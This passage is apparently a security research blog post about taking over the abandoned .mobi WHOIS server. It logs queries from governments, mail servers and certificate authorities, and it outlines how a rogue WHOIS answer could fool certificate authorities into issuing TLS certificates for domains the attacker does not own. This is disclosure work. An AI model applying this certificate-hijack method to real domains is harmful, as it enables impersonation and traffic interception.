So, we began just looking around the Internet for obvious locations that could be sending queries our way. Surely, we thought - surely! - the broken clients using an outdated server address wouldn’t be in anything major, that we use every day?
A significant number of domain registrars and WHOIS-function websites
A screenshot of each WHOIS tool would become repetitive, but you get the idea.
urlscan.io - “A sandbox for the web” - used our WHOIS server for .mobi, too. You can see the results by browsing to a page representing any .mobi domain (like this one).
VirusTotal, the popular malware-analysis site, was querying us! A tool dedicated to the analysis of hostile code seemed like an opportunity for enjoyment.
Sadly, VirusTotal doesn't render our ASCII art properly, but as you can see - VirusTotal is querying our makeshift WHOIS server for this global TLD and presenting back the results. We were also pleased to see that VirusTotal updated their records of who owns bbc.mobi:
For anyone that has ever worked in offensive security, you occasionally get a sinking feeling where you realize something may be a little larger than expected, and you begin to wonder.. “what have we broken?”.
(Editor's note: Technically, this should be ‘what was broken’, because people were querying our WHOIS server without authorisation and we’re very upset - get off our lawn!).
Well, with our WHOIS server clearly working - we figured we’d come back in a few days and see if anything at all reached out to us - giving us a good excuse to stare at a separate PSIRT response indicating a 2 year lead time to resolve a vulnerability.
Being insatiable and generally finding it hard to focus on anything longer than a TikTok video of a dog in a hat, we took a look to see how many unique IPs had queried our new WHOIS server after a few hours:
$ sqlite3 whois-log-copy.db "select source from queries"|sort|uniq|wc -l
76085
Uh. Yes, that’s correct - this is 76,000+ unique source IP addresses that have sent queries to our WHOIS server in just a couple of hours.
We were somewhat dismayed when, after leaving our server running for around two days, the poor little SQLite DB containing the logs ballooned to some 1.3 million queries! Clearly, we’d stumbled into something more major than we’d anticipated.
We threw the list of IPs at ZDNS and just sat back, as a relatively feeble way of doing attribution:
Some other highlights of source hosts (not exhaustive, but just to give you some idea of just how bad this trash fire appeared to be):
Mail servers! Lots and lots of mail servers.
Spam filters will often do WHOIS lookups on sender domains. We saw a bunch of these, ranging from the aptly-named cheapsender.email through to mail.bdcustoms.gov.bd - which appears to be part of the Bangladeshi government's infrastructure. Yikes! Theoretically, we could cause mayhem by serving responses indicating that the sending domain was a known spammer - and even more mayhem-worthy to start fuzzing the WHOIS parsing code to pop RCE on the mail servers themselves.
(We didn’t)
Leading on from that thought, what other .gov apparatus have we been queried by? Well, we found Brazil in our logs multiple times - for example, antispam.ap.gov.br and master.aneel.gov.br , and Brazil was not alone. We also found .gov addresses belonging to (but again not limited to):
Argentina,
Pakistan,
India,
Bangladesh,
Indonesia,
Bhutan,
Philippines,
Israel,
Ethiopia,
Ukraine,
USA.
Neat.
Militaries (.mil)
Swedish Armed Forces, for example
Universities (.edu)
All of them
We even saw cyber security companies - hey Group-IB, Detectify! - query our WHOIS server (presumably doing threat intel things for .mobi domains).
We saw Censys query us for ‘google.com’ and wondered if we’d get an APT number and a threat intel report shout-out if we’d been actively delivering payloads. Maybe we did? Check your boxen. (We didn't. Or did we?)
We’re still trying to determine what software solutions are in play here/configured to query this WHOIS server for .mobi - let us know if you have any ideas.
Those who are nefariously minded likely realised what we saw as well - with .gov and other mail servers querying us each time they received an email from a .mobi domain - we could begin to passively determine who may be in communication.
This is not ideal. How do we fix this? Well, hold that thought - IT GETS WORSE.
Tales of TLS
TLS/SSL. Everyone knows it - it’s that friendly little padlock icon in the address bar that assures you that your connection is secure. It’s powered by the concept of certificates - sometimes used for HTTPS, sometimes used for signing your malware.
For example, say you’re the owner of watchTowr.mobi. You want to secure communications to your web server by speaking TLS/SSL, so you go off to your favourite Certificate Authority and request a certificate (let’s also pretend you haven’t heard of LetsEncrypt).
The Certificate Authority will verify that you own the domain in question - watchTowr.mobi - and will then sign a private certificate, attesting to your identity as the owner of that domain. This is then used by the browser to ensure your communications are secure.
Anyway, what does this have to do with WHOIS, and what does it have to do with us?!
Well, it turns out that a number of TLS/SSL authorities will verify ownership of a domain by parsing WHOIS data for your domain - say watchTowr.mobi - and pulling out email addresses defined as the ‘administrative contact’.
The process is to then send that email address a verification link - once clicked, the Certificate Authority is convinced that you control the domain that you are requesting a TLS/SSL cert for and they will happily mint you a certificate.
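As a rough illustration of what that CA-side step can reduce to, the sketch below pulls candidate contact addresses out of raw WHOIS text with a regex. The field names are assumptions about a typical record layout rather than any specific CA's parser; the point is that whatever text the WHOIS server returns ends up treated as authoritative.

import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

def contact_emails(whois_text: str) -> list:
    # Naively extract candidate contact addresses from a raw WHOIS response.
    candidates = []
    for line in whois_text.splitlines():
        if re.match(r"\s*(Registrant|Admin|Tech).*Email", line, re.IGNORECASE):
            candidates.extend(EMAIL_RE.findall(line))
    # Fall back to any address in the response if no labelled field matched.
    return candidates or EMAIL_RE.findall(whois_text)

print(contact_emails("Admin Email: hostmaster@example.mobi"))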
For example:
Perhaps you can see where we’re going with this? sobs
If a TLS/SSL certificate authority is using our WHOIS server for .mobi domains, we can likely provide our own email address for this “Email Domain Control Validation” method.
Uh-oh. Is this a fringe feature supported only by two-bit, poor-quality certificate authorities?
No! Here’s a sample of large TLS/SSL Certificate Authorities/resellers that support WHOIS-based ownership verification:
Trustico
Comodo
SSLS
GoGetSSL
GlobalSign
DigiSign
Sectigo
Going through the normal order flow, we began cautiously - by generating a CSR (Certificate Signing Request) for the fictitious domain watchTowr.mobi - the logic being that as long as our WHOIS server was queried, whether or not the domain was real was irrelevant because we respond positively to absolutely every request including domains that don’t actually exist.
# sudo openssl req -new -key custom.key -out csr.pem
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:SG
State or Province Name (full name) [Some-State]:Singapore
Locality Name (eg, city) []:Singapore
Organization Name (eg, company) [Internet Widgits Pty Ltd]:watchTowr
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:watchtowr.mobi
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
We’re not going to walk through each provider - for the purposes of illustration, we’ll use GoGetSSL.
Once we upload our watchTowr.mobi CSR to GoGetSSL, it is parsed, and we continue. The presence of these placeholder email addresses indicates that the WHOIS lookup was not successful - instead of the email address that our WHOIS server is configured to respond with ([email protected]), we’re presented with only @watchtowr.mobi domains.
That’s something of a relief.
The Certificate Authority has correctly determined that the domain watchTowr.mobi does not exist and thus if WHOIS is working as expected, no email addresses will be returned. We concluded that our newly set up WHOIS server was not being queried by the provider.
At least the world isn’t ending. Right? (spoiler: it actually was)
We carried on trying a few other providers until a thought occurred.
The WHOIS protocol is extremely simple. Essentially it is a string blob returned in various formats depending on the TLD serving it. Each provider implements parsing in their own way. Perhaps, before we write off our theory, we should make sure this verification mechanism is actually working as it is supposed to.
So, we began again - choosing microsoft.mobi as a .mobi domain that appeared to follow a fairly typical WHOIS format (when using the current .mobi WHOIS server).
The screenshot below shows that the legitimate WHOIS record for microsoft.mobi was correctly parsed at Entrust, as the only email addresses available for validation were at the microsoft.com domain:
While the WHOIS record for watchTowr.mobi was not being parsed at all (indicating that Entrust was using the correct WHOIS server, and not ours):
Looks good you think?
WRONG.
We skipped and hopped over to the next provider, GlobalSign. GlobalSign reported that they were unable to parse the WHOIS record of microsoft.mobi:
At this point, something clicked in our minds. Perhaps GlobalSign WAS querying our new WHOIS server - but the string returned by our WHOIS server was incompatible with GlobalSign’s parsing?
We copied the microsoft.mobi output from the legitimate WHOIS server, made it our own, and loaded it into our own WHOIS server - updated to look like the following:
Holding our breath, we then re-triggered GlobalSign with a CSR for microsoft.mobi…
We want to be explicitly clear that we stopped at this point and did not issue any rogue TLS/SSL certificates to ourselves. This would undoubtedly create an incident, and require significant amounts of work by many parties to revoke and roll back this action.
Success!
The GlobalSign TLS/SSL certificate WHOIS domain verification system had queried our WHOIS server, parsed [email protected] from the result, and presented it as a valid email address to send a verification email to, allowing us to complete verification and obtain a valid TLS/SSL certificate.
This is then blindingly simple:
Set up a rogue WHOIS server on our previously authoritative hostname, responding with our own email address as an ‘administrative contact’
Attempt to purchase a TLS/SSL certificate for a .mobi domain we want to target (say, microsoft.mobi)
A Certificate Authority will then perform a WHOIS lookup, and email us instead of the real domain owners [theory]
We click the link, and.. [theory]
… receive a TLS/SSL cert for the target domain! [theory]
Now that we have the ability to issue a TLS/SSL cert for a .mobi domain, we can, in theory, do all sorts of horrible things - ranging from intercepting traffic to impersonating the target server. It’s game over for all sorts of threat models at this point.
While we are sure some may say we didn’t ‘prove’ we could obtain the certificate, we feel this would’ve been a step too far — so whatever.
One Last Thing
Please stop emailing us..
Here We Go Again..
We hope you’ve enjoyed (and/or been terrified by) today’s post, in which we took control of a chunk of the Internet’s infrastructure, opened up a big slab of juicy attack surface, and found a neat way of undermining TLS/SSL - the fundamental protocol that allows for secure communication on the web.
We want to thank the UK's NCSC and the ShadowServer Foundation for rapidly working with us ahead of the release of this research to ensure that the 'dotmobiregistry.net' domain is suitably handled going forwards, and that a process is put in place to notify affected parties.
The dotmobiregistry.net domain, and the whois.dotmobiregistry.net hostname, have been pointed to sinkhole systems provided by ShadowServer that now proxy the legitimate WHOIS response for .mobi domains.
We released this blog post to initially share our process around making the unexploitable exploitable and highlight the state of legacy infrastructure and increasing problems associated with abandoned domains - but inadvertently, we have shone a spotlight on the continuing trivial loopholes in one of the Internet’s most vital encryption processes and structures - TLS/SSL Certificate Authorities. Our research has demonstrated that trust placed in this process by governments and authorities worldwide should be considered misplaced at this stage, in our opinion.
We continue to hold concern around the basic reality - we found this on a whim in a hotel room while escaping the Vegas heat surrounding Black Hat, while well-resourced and focused nation-states look for loopholes like this every day. In our opinion, we are not likely to be the last to find inexcusable flaws in such a crucial process.
Although subverting the CA verification process was by far the most devastating impact that we uncovered, it was by no means the limit of the opportunity available to us, as we also found everything from memory corruptions to command injections. Our ‘honeypot’ WHOIS server gave us some interesting statistics, revealing just how serious the issue is: a large amount of Internet infrastructure continues to query us instead of the legitimate WHOIS servers.
We do not intend to call out any specific organization or maintainer here - the prevalence of this issue and the statistics on hand show that this is not a pure-negligence or competence related issue - but a fundamental flaw in how these processes work together.
It’s worth noting that all the above attacks that we were able to orchestrate given our takeover are also possible by any entity that is able to carry out MITM attacks - such as entities that control or can influence transit backbones. It would be very easy for an attacker with such access to fake WHOIS data for any domain, and thus obtain valid TLS/SSL certificates. Of course, there has been a monumental level of effort by major players to add transparency to this process over the years, and thus 'pulling off' a heist of this scale has its operational hurdles.
At watchTowr, we passionately believe that continuous security testing is the future and that rapid reaction to emerging threats single-handedly prevents inevitable breaches.
With the watchTowr Platform, we deliver this capability to our clients every single day - it is our job to understand how emerging threats, vulnerabilities, and TTPs could impact their organizations, with precision.
If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.